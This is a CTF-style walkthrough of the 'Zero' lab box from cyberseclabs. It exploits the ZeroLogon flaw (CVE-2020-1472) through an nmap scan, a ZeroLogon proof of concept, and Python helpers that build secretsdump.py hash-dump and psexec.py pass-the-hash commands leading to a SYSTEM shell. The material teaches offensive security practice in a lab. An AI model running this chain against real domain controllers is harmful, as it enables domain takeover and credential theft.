Zero is a beginner-level Active Directory box from cyberseclabs.co.uk. It is built around “ZeroLogon” (CVE-2020-1472), a recently released critical vulnerability in Active Directory environments that allows instant escalation to Domain Admin. Let’s try this one out!

Recon

A quick nmap scan should do the job for this box. The only things we really need are the RPC service and the Domain Controller’s name, but it’s always a good idea to run a full scan to get an idea of what else is on the box.

nmap -sCV -p- 172.31.1.29

PORT STATE SERVICE VERSION

53/tcp open domain?

88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-25 02:51:16Z)

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)

445/tcp open microsoft-ds?

464/tcp open kpasswd5?

593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0

636/tcp open tcpwrapped

3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Zero.csl0., Site: Default-First-Site-Name)

3269/tcp open tcpwrapped

3389/tcp open ms-wbt-server Microsoft Terminal Services

| rdp-ntlm-info:

| Target_Name: ZERO

| NetBIOS_Domain_Name: ZERO

| NetBIOS_Computer_Name: ZERO-DC

| DNS_Domain_Name: Zero.csl

| DNS_Computer_Name: Zero-DC.Zero.csl

| Product_Version: 10.0.17763

|_ System_Time: 2020-09-25T02:53:53+00:00

| ssl-cert: Subject: commonName=Zero-DC.Zero.csl

| Issuer: commonName=Zero-DC.Zero.csl

| Public Key type: rsa

| Public Key bits: 2048

| Signature Algorithm: sha256WithRSAEncryption

| Not valid before: 2020-09-23T21:38:22

| Not valid after: 2021-03-25T21:38:22

| MD5: 3683 bd36 cdde dee0 bdc9 5126 3f19 8933

|_SHA-1: 35a8 b567 26fc c755 4ed9 b35d 693a 2d44 aa8c 5bc7

|_ssl-date: 2020-09-25T02:54:07+00:00; -1s from scanner time.

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

9389/tcp open mc-nmf .NET Message Framing

21837/tcp filtered unknown

35084/tcp filtered unknown

47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

|_http-server-header: Microsoft-HTTPAPI/2.0

|_http-title: Not Found

The only thing of interest to us here is the host information the nmap scripts returned (the rdp-ntlm-info output), since the NetBIOS computer name, ZERO-DC, is what we’ll need to exploit ZeroLogon. Nothing in the scan points to this vulnerability apart from the machine being a DC, so if you don’t already know about ZeroLogon, this box is going to be rather perplexing.
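If you save the scan to a file, the few fields that matter can be pulled out programmatically. The following is a minimal sketch, not part of the original walkthrough: the `parse_ntlm_info` helper and the `SCAN_OUTPUT` constant are hypothetical names, and the sample text is simply the rdp-ntlm-info block copied from the scan above.

```python
import re

# Sample lines copied from the nmap output above (rdp-ntlm-info block only).
SCAN_OUTPUT = """\
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ZERO
| NetBIOS_Domain_Name: ZERO
| NetBIOS_Computer_Name: ZERO-DC
| DNS_Domain_Name: Zero.csl
| DNS_Computer_Name: Zero-DC.Zero.csl
| Product_Version: 10.0.17763
|_ System_Time: 2020-09-25T02:53:53+00:00
"""

# Matches script output lines such as "| Key_Name: value" or "|_ Key_Name: value".
FIELD = re.compile(r"^\|_?\s*([A-Za-z_]+):\s*(\S.*)$")


def parse_ntlm_info(text):
    """Return the key/value pairs of an rdp-ntlm-info block as a dict."""
    info = {}
    for line in text.splitlines():
        match = FIELD.match(line.strip())
        if match:
            info[match.group(1)] = match.group(2).strip()
    return info


info = parse_ntlm_info(SCAN_OUTPUT)
print(info["NetBIOS_Computer_Name"], info["DNS_Domain_Name"])
```

The two values printed here, the DC’s NetBIOS name and its domain, are the ones the rest of the walkthrough relies on.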

Exploiting ZeroLogon



The exploit for this box, dubbed “ZeroLogon”, allows us to instantly take over a Domain Controller by resetting its machine account password to an empty string. For a detailed explanation of the inner workings of this exploit, I found this. The exploit requires the latest version of impacket, and even then it may throw errors. The easiest approach is to set up a virtualenv, then install impacket and run the exploit inside it. This can be done with the following commands (the first line can be skipped if virtualenv is already installed):
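For some intuition on why the attack works at all: as I understand the public write-ups, Netlogon’s authentication encrypts an 8-byte challenge with AES in CFB8 mode using a fixed all-zero IV, so an all-zero challenge encrypts to all zeros for roughly 1 in 256 session keys. The toy sketch below illustrates only that property. It is an assumption-laden illustration, not the PoC: `toy_block_encrypt` is a hypothetical stand-in built on SHA-256 rather than real AES, and the 4-byte keys are made up for the demo.

```python
import hashlib

BLOCK = 16  # AES block size in bytes


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES: a keyed pseudo-random function (NOT real AES)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8 mode: one block-cipher call per plaintext byte."""
    register = iv
    out = bytearray()
    for byte in plaintext:
        # Only the first byte of the encrypted register is used as keystream.
        keystream = toy_block_encrypt(key, register)[0]
        cipher_byte = byte ^ keystream
        out.append(cipher_byte)
        # Shift the register left by one byte and append the ciphertext byte.
        register = register[1:] + bytes([cipher_byte])
    return bytes(out)


ZERO_IV = bytes(BLOCK)
ZERO_CHALLENGE = bytes(8)


def weak_keys(count: int):
    """Return the demo keys for which the zero challenge encrypts to zeros."""
    keys = (i.to_bytes(4, "big") for i in range(count))
    return [k for k in keys
            if cfb8_encrypt(k, ZERO_IV, ZERO_CHALLENGE) == bytes(8)]


hits = weak_keys(4096)
print(f"{len(hits)} of 4096 demo keys map the zero challenge to zero ciphertext")
```

Once the first keystream byte happens to be zero, the shift register never changes, so every following byte comes out zero as well. That is why simply retrying the handshake a few hundred times is enough.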

python3 -m pip install virtualenv

python3 -m virtualenv impkt

source impkt/bin/activate

pip install git+https://github.com/SecureAuthCorp/impacket
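Before running anything, it can be worth confirming that the virtualenv is really active and that impacket landed inside it. Here is a small sketch of one way to check, using only the standard library; the `installed_version` helper is a hypothetical name, and the version it reports will depend on what pip pulled down.

```python
import sys
from importlib import metadata


def installed_version(package: str):
    """Return the installed version string of a package, or None if absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


# Inside a virtual environment, sys.prefix differs from the base interpreter's
# prefix (older virtualenv releases set sys.real_prefix instead).
in_virtualenv = (
    sys.prefix != getattr(sys, "base_prefix", sys.prefix)
    or hasattr(sys, "real_prefix")
)

print("virtualenv active:", in_virtualenv)
print("impacket:", installed_version("impacket") or "not installed here")
```

Run it with the same `python3` that the activated environment provides; if it reports that impacket is missing, the install went to a different interpreter.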



Now that impacket is properly installed, we can pull down the ZeroLogon PoC, which can be found here. Let’s run the PoC and see whether the box is vulnerable to ZeroLogon. For this we need the name of the Domain Controller (Zero-DC) and the IP of the box (172.31.1.29).

And it worked! Now that the machine account password has been changed to an empty string, we can use an impacket tool called secretsdump.py to dump the hashes on the machine.
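The exact command I ran is in the screenshot, so treat the following as a hedged reconstruction rather than a transcript. It sketches how a secretsdump.py call against the DC’s machine account might be assembled, assuming the `-just-dc` and `-no-pass` options and impacket’s usual `DOMAIN/ACCOUNT@IP` target format; the `secretsdump_command` helper is a hypothetical name. The machine account is the computer name with a trailing `$`.

```python
import shlex


def secretsdump_command(domain, dc_name, dc_ip):
    """Build an argv list that authenticates as the DC machine account
    with an empty password (assumed flags: -just-dc, -no-pass)."""
    target = f"{domain}/{dc_name}$@{dc_ip}"
    return ["secretsdump.py", "-just-dc", "-no-pass", target]


# Values taken from the scan: NetBIOS domain ZERO, computer name ZERO-DC.
cmd = secretsdump_command("ZERO", "ZERO-DC", "172.31.1.29")

# shlex.join quotes the target so the shell does not try to expand the "$".
print(shlex.join(cmd))
```

Building the command as a list and quoting it at the end avoids the most common mistake here, which is the shell eating the `$` in the account name.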





We now have the hashes of the machine! We can use psexec.py, another impacket tool, to gain a SYSTEM-level shell on the box using the hashes we dumped.
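secretsdump.py prints each account as `user:rid:lmhash:nthash:::`, and psexec.py accepts the `lmhash:nthash` pair through its `-hashes` option. The sketch below shows one way to go from a dump line to a pass-the-hash command. The helper names are hypothetical, and the sample line uses the well-known hashes of an empty password as placeholder data, not the real hashes from this box.

```python
import shlex

# Placeholder line in secretsdump's output format. The hashes are the
# well-known LM/NT hashes of an empty password, NOT values from this box.
SAMPLE = ("Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
          "31d6cfe0d16ae931b73c59d7e0c089c0:::")


def parse_dump_line(line):
    """Split a 'user:rid:lmhash:nthash:::' line into its useful parts."""
    user, rid, lm_hash, nt_hash = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "hashes": f"{lm_hash}:{nt_hash}"}


def psexec_command(domain, entry, target_ip):
    """Build a psexec.py argv list that authenticates with the dumped hashes."""
    target = f"{domain}/{entry['user']}@{target_ip}"
    return ["psexec.py", "-hashes", entry["hashes"], target]


entry = parse_dump_line(SAMPLE)
print(shlex.join(psexec_command("ZERO", entry, "172.31.1.29")))
```

Swap the sample line for the Administrator line from your own dump and the printed command is ready to paste.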

We are SYSTEM!